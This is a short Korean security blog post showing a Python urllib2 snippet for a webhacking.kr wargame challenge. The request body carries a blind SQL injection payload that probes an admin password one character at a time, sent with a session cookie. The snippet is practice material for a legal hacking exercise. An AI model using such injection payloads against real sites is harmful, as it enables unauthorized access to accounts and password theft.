Notice
Recent Posts
Recent Comments
Link
«   2025/07   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

urllib2 request 본문

Security/Web

urllib2 request

Cdor1 2017. 4. 3. 10:44

url = 'http://webhacking.kr/challenge/bonus/bonus-2/index.php'

data = "id=admin' and ascii(substr(pw,str(i),1))=str(j)#"

headers = {'Cookie': "PHPSESSID=%s " % ssid}

req = urllib2.Request(url, data, headers)

'Security > Web' 카테고리의 다른 글

Webhacking.kr 50번  (0) 2017.04.05
Webhacking.kr 21번  (0) 2017.04.04
Webhacking.kr 25번  (0) 2017.04.03
Webhacking.kr 18번  (0) 2017.04.01
Webhacking.kr 9번  (0) 2017.03.31
Comments